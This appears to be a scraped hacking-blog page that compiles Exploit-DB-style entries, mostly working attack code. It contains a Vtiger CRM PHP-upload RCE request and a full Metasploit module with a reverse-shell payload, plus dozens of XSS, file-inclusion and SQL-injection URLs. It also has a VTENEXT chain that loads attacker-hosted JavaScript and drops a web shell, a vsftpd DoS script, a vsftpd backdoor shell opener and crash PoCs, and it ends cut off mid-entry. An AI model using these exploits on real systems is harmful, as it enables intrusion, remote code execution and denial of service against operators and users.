-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
# Exploit Title: Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution
# Date: 2015-09-28
# Exploit Author: Benjamin Daniel Mussler
# Vendor Homepage: https://www.vtiger.com
# Software Link: https://www.vtiger.com/open-source-downloads/
# Version: 6.3.0 (and lower)
# Tested on: Linux (Ubuntu)
# CVE : CVE-2015-6000
# Source: http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== Description ===
Vtiger CRM's administration interface allows for the upload of a company
logo. Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and run this code by accessing the resulting
PHP file.
Detailed description:
http://b.fl7.de/2015/09/vtiger-crm-authenticated-rce-cve-2015-6000.html
=== PoC ===
Through a specially crafted HTTP-POST request, a PHP file is stored on
the server hosting the Vtiger CRM software:
POST /index.php HTTP/1.1
Host: [...]
Cookie: [...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------51732462825208
Content-Length: 2040
-----------------------------51732462825208
Content-Disposition: form-data; name="__vtrftk"
[...]
-----------------------------51732462825208
Content-Disposition: form-data; name="logo"; filename="2.php"
Content-Type: image/jpeg
<? system('id; uname -a; /sbin/ifconfig -a'); system('cat ../../vtigerversion.php'); ?>
-----------------------------51732462825208
Content-Disposition: form-data; name="address"
[...]
The resulting PHP file can then be accessed at
[Vtiger URL]/test/logo/2.php
- --
Benjamin Daniel MUSSLER
Ix-Xgħajra, Malta Tel (MT) +356 9965 3798
Karlsruhe, Germany Tel (DE) +49 721 989 0150
Web: https://FL7.DE PGP: https://FL7.DE/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (MingW32)
iQIcBAEBAgAGBQJWCVaeAAoJEAg0a3ng3v4f108P/0u+CUuUKSsSFiQt4S/HVAnw
5ykzNoZ/T1v0LUrItI1bZPeTyRr6VUandYclg68OM3VY0zc4x9161ScSlcnIitVO
AasvEw7mGguAR4Pe2i84LpPNvE6Bi+MJqU6vnBqZVmQMXUY8k+Mb0ufM/DMByLPj
dcozrAgI9ZQC3pnWiOPigD+gHe/AxY3Z1cxQLluOqBmMf7f3JXC+1dZt91EScuyi
lHNtd6/uRtHJKqBG8MZMXnq49OxTk7iiqQmb393RizPL0eI8FumwaCXTDnLgRwX3
7XQfmg3sCzT1jPSQB4/UYciePPOS4EREjDA/RW5ydtGRCkZPvmjUlfaFMwTjlCd1
dpRIRlzDBWUCVFIqkp2TGkrkbckA1hnehH1q64sQ4KopdKl0tPJ8yLumVr2Uvwtq
iLAbhQcn6+Cr9gctzOlrbj7BqY9uC0HfVdsl1qOCN5v3Yrbq7h/ToPnKGACLQN7t
sALb61+vvriPimTVZD3AQg9t82G1brPHMzp+cLwjhYtw8b+2rohAA0JoUgBsCUHG
8dgnHI1K514soGkCDB4Mk2oM5W8T2tMsxvX/iQDH45IL3hYrROnWUnW+Fd3hA3ks
VsqaNpaDEm+allop6OH3PETs6rGsLyaspCJBdkqKqxNOS6XE+lScrBVxzNL4VJL2
i8fbvZ/RIkuBT0Z79hUV
=gMXq
-----END PGP SIGNATURE-----
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863588802
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload',
'Description' => %q{
Vtiger 6.3.0 CRM's administration interface allows for the upload of
a company logo.
Instead of uploading an image, an attacker may choose to upload a
file containing PHP code and
run this code by accessing the resulting PHP file.
This module was tested against vTiger CRM v6.3.0.
},
'Author' =>
[
'Benjamin Daniel Mussler', # Discoverys
'Touhid M.Shaikh <admin[at]touhidshaikh.com>' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-6000'],
['CVE','2016-1713'],
['EDB', '38345']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'php/meterpreter/reverse_tcp',
'Encoder' => 'php/base64'
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'vTiger CRM v6.3.0', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 28 2015'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base vTiger CRM directory
path", '/']),
OptString.new('USERNAME', [ true, "Username to authenticate
with", 'admin']),
OptString.new('PASSWORD', [ true, "Password to authenticate
with", 'password'])
])
# Some PHP version uses php_short_code=ON
register_advanced_options(
[
OptBool.new('PHPSHORTTAG', [ false, 'Set a short_open_tag
option', false ])
], self.class)
end
def check
res = nil
begin
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,
'index.php') })
rescue
vprint_error("Unable to access the index.php file")
return CheckCode::Unknown
end
if res and res.code != 200
vprint_error("Error accessing the index.php file")
return CheckCode::Unknown
end
if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\/small>/i
vprint_status("vTiger CRM version: " + $1)
case $1
when '6.3.0'
return Exploit::CheckCode::Vulnerable
else
return CheckCode::Detected
end
end
return CheckCode::Safe
end
# Login Function.
def login
# Dummy Request for grabbing CSRF token and PHPSESSION ID
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vhost' => "#{rhost}:#{rport}",
})
# Grabbing CSRF token from body
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
vprint_good("CSRF Token for login: #{csrf}")
# Get Login now.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'module' => 'Users',
'action' => 'Login',
},
'vars_post' => {
'__vtrftk' => csrf,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
},
})
unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
Login request")
end
if res.code == 302 &&
res.headers['Location'].include?("index.php?module=Users&parent=Settings&view=SystemSetup")
vprint_good("Authentication successful:
#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
return res.get_cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed
:[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
return nil
end
end
def exploit
begin
cookie = login
pay_name = rand_text_alpha(rand(5..10)) + ".php"
# Make a payload raw. I added this bcz when i making this module.
server have short_open_tag=ON
vprint_warning("Payload Generate according to
short_open_tag=#{datastore['PHPSHORTTAG']}")
if datastore['PHPSHORTTAG'] == true
stager = '<? '
stager << payload.encode
stager << ' ?>'
else
stager = '<?php '
stager << payload.encode
stager << ' ?>'
end
# Again request for CSRF_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vhost' => "#{rhost}:#{rport}",
'cookie' => cookie
})
# Grabbing CSRF token from body
/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
vprint_good("CSRF Token for Form Upload: #{csrf}")
# Setting Company Form data
post_data = Rex::MIME::Message.new
post_data.add_part(csrf, content_type = nil, transfer_encoding = nil,
content_disposition = "form-data; name=\"__vtrftk\"") # CSRF token
post_data.add_part('Vtiger', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"module\"")
post_data.add_part('Settings', content_type = nil, transfer_encoding
= nil, content_disposition = "form-data; name=\"parent\"")
post_data.add_part('CompanyDetailsSave', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"action\"")
post_data.add_part(stager, content_type = "image/jpeg",
transfer_encoding = nil, content_disposition = "form-data; name=\"logo\";
filename=\"#{pay_name}\"") #payload Content-type bypass
post_data.add_part('vtiger', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"organizationname\"")
post_data.add_part('95, 12th Main Road, 3rd Block, Rajajinagar',
content_type = nil, transfer_encoding = nil, content_disposition =
"form-data; name=\"address\"")
post_data.add_part('Bangalore', content_type = nil, transfer_encoding
= nil, content_disposition = "form-data; name=\"city\"")
post_data.add_part('Karnataka', content_type = nil, transfer_encoding
= nil, content_disposition = "form-data; name=\"state\"")
post_data.add_part('560010', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"code\"")
post_data.add_part('India', content_type = nil, transfer_encoding =
nil, content_disposition = "form-data; name=\"country\"")
post_data.add_part('+91 9243602352', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"phonxe\"")
post_data.add_part('+91 9243602352', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"fax\"")
post_data.add_part('www.touhidshaikh.com', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data;
name=\"website\"")
post_data.add_part('1234-5678-9012', content_type = nil,
transfer_encoding = nil, content_disposition = "form-data; name=\"vatid\"")
post_data.add_part(' ', content_type = nil, transfer_encoding = nil,
content_disposition = "form-data; name=\"saveButton\"")
data = post_data.to_s
print_good("Payload ready for upload : [ #{pay_name} ]")
print_status("Uploading payload..")
# in Company Logo upload our payload.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vhost' => "#{rhost}:#{rport}",
'cookie' => cookie,
'connection' => 'close',
'headers' => {
'Referer' => "http://
#{rhost}:#{rport}/index.php?parent=Settings&module=Vtiger&view=CompanyDetails",
'Upgrade-Insecure-Requests' => '1',
},
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
})
unless res && res.code == 302
fail_with(Failure::None, "#{peer} - File wasn't uploaded,
aborting!")
end
# Cleanup file.
register_files_for_cleanup(pay_name)
print_status("Executing Payload [
#{rhost}:#{rport}/test/logo/#{pay_name} ]" )
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "test", "logo", pay_name)
})
# If we don't get a 200 when we request our malicious payload, we
suspect
# we don't have a shell, either.
if res && res.code != 200
print_error("Unexpected response, probably the exploit failed")
end
disconnect
end
end
end
source: https://www.securityfocus.com/bid/47267/info
vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E
source: https://www.securityfocus.com/bid/47263/info
vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
source: https://www.securityfocus.com/bid/49927/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
/phprint.php?module=Home&action=--><script>alert(/xss/)</script>&parenttab=MyHome Page"><script>alert(0)</script>&jt=
/phprint.php?module=--><script>alert(/xss/)</script>&action=index&parenttab=My%20Home%20Page&jt=
source: https://www.securityfocus.com/bid/50364/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/modules/mobile/index.php?_operation="><script>alert(1)</script>
http://www.example.com/modules/mobile/index.php?_operation=listModuleRecords&module=Services&search="><script>alert(1)</script>
source: https://www.securityfocus.com/bid/49927/info
vtiger CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1&return_url="><script>alert(/XSS/)</script>
/index.php?module=com_vtiger_workflow&action=editworkflow&workflow_id=1'"><script>alert(/XSS/)</script>&return_url=1
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01aa8ed'><script>alert(/xss/)</script>e8e16680dfc&query=true&type=dbrd&owner=admin&viewname=10
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-0189b81'><script>alert(1)</script>&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=1
/index.php?module=Calendar&action=EditView&return_module=Contacts&return_action=DetailView&activity_mode=Events&return_id=29&contact_id=><script>alert(1)</script>d3ef7f5e017&account_id=16&parenttab=Marketing
/index.php?module=Potentials&action=ListView&date_closed=2006-01'><script>alert(1)</script>&sales_stage=Other&query=true&type=dbrd&owner=admin&viewname=10
/index.php?action=index&module=Calendar&view=week&hour=0&day=5%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin%27%20onmouseover%3d%27alert(/XSS/)%27%2520x%253d%27&viewname=10
/index.php?module=Potentials&action=ListView&leadsource=--None--'><script>alert(1)</script>&query=true&type=dbrd&viewname=10
/index.php?module=Settings&action=profilePrivileges&mode=view%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&parenttab=Settings&profileid=1
/index.php?module=Calendar&action=EditView&return_module=Leads&return_action=DetailView&activity_mode=Events&return_id=37&parent_id=37"><script>alert(/XSS/)</script>&parenttab=Marketin
/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%3b}}alert(/XSS/)%3bfunction+xss(){x%3d=0;if(x){x%3d1&mode=view
/index.php?module=Campaigns&searchtype=BasicSearch&search_field=campaignname&query=truef1de8%22%20onmouseover%3d%22alert%281%29%22%2007&search_text=test&action=index&parenttab=Marketing&search_cnt=
/index.php?module=Potentials&action=ListView&sales_stage=Prospect'><script>alert(/XSS/)</script>x&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=dbrd&owner=admin&viewname=10
/index.php?action=ListView&module=Calendar&record=116&viewname=19&start=1371b1"%20onmouseover="alert(0)"%20a%3db%22&parenttab=My%20Home%20Page
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&parenttab=My&onlyforuser=1
/index.php?module=Potentials&action=ListView&sales_stage=Prospecting&closingdate_start=2001-01-01&closingdate_end=2100-01-01&query=true&type=db%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&owner=admin&viewname=10
/index.php?action=index&module=Calendar&view=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22&subtab=event&parenttab=My&onlyforuser=1
/index.php?module=Calendar&action=CalendarAjax&file=ListView&ajax=changestate&viewname=10"'%20onmouseover=alert(/XSS/)%20x='&errormsg=
/index.php?action=DetailView&module=Calendar&record=116&activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&parenttab=My
/index.php?module=Dashboard&action=index&display_view=50%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&pbss_edit=true
/index.php?module=Reports&action=SaveAndRun&record=1&folderid=17920%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
/index.php?module=Settings&action=createnewgroup&returnaction=listgroups&parenttab=Settings&mode=edit&groupId=2%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
/index.php?module=Settings&action=createrole&roleid=H2&parenttab=Settings&mode=edit%22%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS
index.php?module=Settings&action=createrole&parenttab=Settings&parent=H%22%20style=%22background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;
/index.php?module=Settings&action=profilePrivileges&parenttab=Settings&profileid=1%22%20style%3dbackground%2dimage%2durl('javascript:alert(0)')%3bwidth:1000px;height:1000px;display:block;%22%20x%3d&mode=view
/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns&return_action=index"%20style%3d"x%3aexpression(alert(1))"%20x="s&parenttab=Marketing&return_viewname=29
/index.php?module=Campaigns&action=EditView&record=124&return_module=Campaigns"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&return_action=index&parenttab=Marketing&return_viewname=29
/index.php?module=Settings&action=createnewgroup&returnaction=listgroups"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&parenttab=Settings&mode=edit&groupId=2
/index.php?module=Settings&action=RoleDetailView&roleid=H2"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s
/index.php?module=Settings&action=ModuleManager&module_update=Step1&src_module=Mobile3"%20style%3d"background-image%3aurl(javascript:alert(/XSS/))"%20x="s&parenttab=Setting
/index.php?action=index&module=Calendar&view=week"%20style%3d"xss%3aexpression(alert(1))"&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
source: https://www.securityfocus.com/bid/49948/info
vtiger CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
vtiger CRM 5.2.1 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d1--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+1%3d2--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d5--
http://www.example.com/index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=12&year=2011&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1+or+@@version%3d4--
#!/usr/bin/python3
# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : N/A
# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure
# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .
# CSRF - No CSRF protections in place.
# exploit.js needs to be hosted somewhere, IP's need to be replaced
# check_csrf() should be changed based on your setup
# run_shell() is a "nice to have"
# content of exploit.js
"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
xhr.setRequestHeader('Content-Length', '248');
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
xhr.withCredentials = true;
var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
insertImage();
"""
import smtplib
import datetime
import requests
import os
import time
base_url = "http://192.168.226.168/vtenext19ce/"
print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")
def build_url():
d = datetime.datetime.today()
year = str(d.year)
month = str(d.strftime("%B"))
week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
return(tmp)
def build_mail():
_from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
_to = "admin@example.com"
_subject = "Important!"
_body = "While you're reading this, a file is being uploaded to this server."
msg = "From: " + _from + "\n"
msg += "To: " + _to + "\n"
msg += "Subject: " + _subject + "\n\n"
msg += _body
return msg
def send_mail():
msg = build_mail()
smtp_server = '192.168.226.167'
smtp_port = 25
sender = 'user1@lab.local'
receiver = 'admin@lab.local'
server = smtplib.SMTP(smtp_server, smtp_port)
server.sendmail(sender, receiver, msg)
def check_csrf():
while True:
is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()
if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
print("[>] CSRF triggered")
break
else:
time.sleep(0.5)
continue
def find_shell():
print("[>] Locating shell")
time.sleep(1)
tmp1 = build_url()
for i in range(1, 9999):
url = tmp1 + str(i) + "_shell.pht"
r = requests.get(url)
if r.status_code == 200:
print("[>] Found the shell")
print("[-] Location: " + url)
return url
else:
continue
def run_shell(x):
print("\n")
while True:
cmd = input("shell> ")
if cmd == "exit":
break
else:
url = x + "?x=" + cmd
r = requests.get(url)
print(r.text)
print("[>] Sending email")
send_mail()
print("[-] Waiting for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
# Date: 22-03-2021
# Exploit Author: xynmaps
# Vendor Homepage: https://security.appspot.com/vsftpd.html
# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
# Version: 3.0.3
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| VS-FTPD |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
# Exploit Title: VSCO 1.1.1.0 - Denial of Service (PoC)
# Date: 2/14/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NC1RLNH76PB
# Version: 1.1.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the top right search bar and hit Search
# Click back to Home
# App will now crash
buffer = "A" * 5000
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-11-05
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
# Steps to Reproduce:
# 1. Run the python code organization.py
# 2. Open organization_exploit.txt and copy the content
# 3. Open VSAXESS.exe
# 4. Register a password and username
# 5. choose 'Control Panel'
# 6. choose 'Access Control'
# 7. choose 'Add'
# 8. Paste the content from organization_exploit.txt on 'Organization' and Crashed
#!/usr/bin/env python3
content = "\x41" * 10000
f = open ("organization_exploit.txt", "w")
f.write(content)
f.close()
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'Nickname' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-08-31
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
# Steps to Reproduce:
# 1. Run the python code Nickname.py
# 2. Open nickname_exploit.txt and copy the content
# 3. Open VSAXESS.exe
# 4. Register a password and username
# 5. choose 'Add'
# 6. choose 'Serial Port'
# 6. Paste the content from nickname_exploit.txt on 'Nickname'
# 7. Press 'Aceptar' and Crashed
#!/usr/bin/env python
content = "\x41" * 9300
f = open ("nickname_exploit.txt", "w")
f.write(content)
f.close()
# Exploit Title: VPN unlimited 6.1 - Unquoted Service Path
# Date: 2020-1-13
# Exploit Author: Amin Rawah
# Vendor Homepage: https://www.vpnunlimitedapp.com
# Version: 6.1
# Tested on: Windows 10 64bit
C:\Users\Amin>sc qc VPNUnlimitedService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VPNUnlimitedService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VPN
Unlimited\vpn-unlimited-daemon.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VPN Unlimited Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: VPN Browser+ 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NFFFFS5Z2C7
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
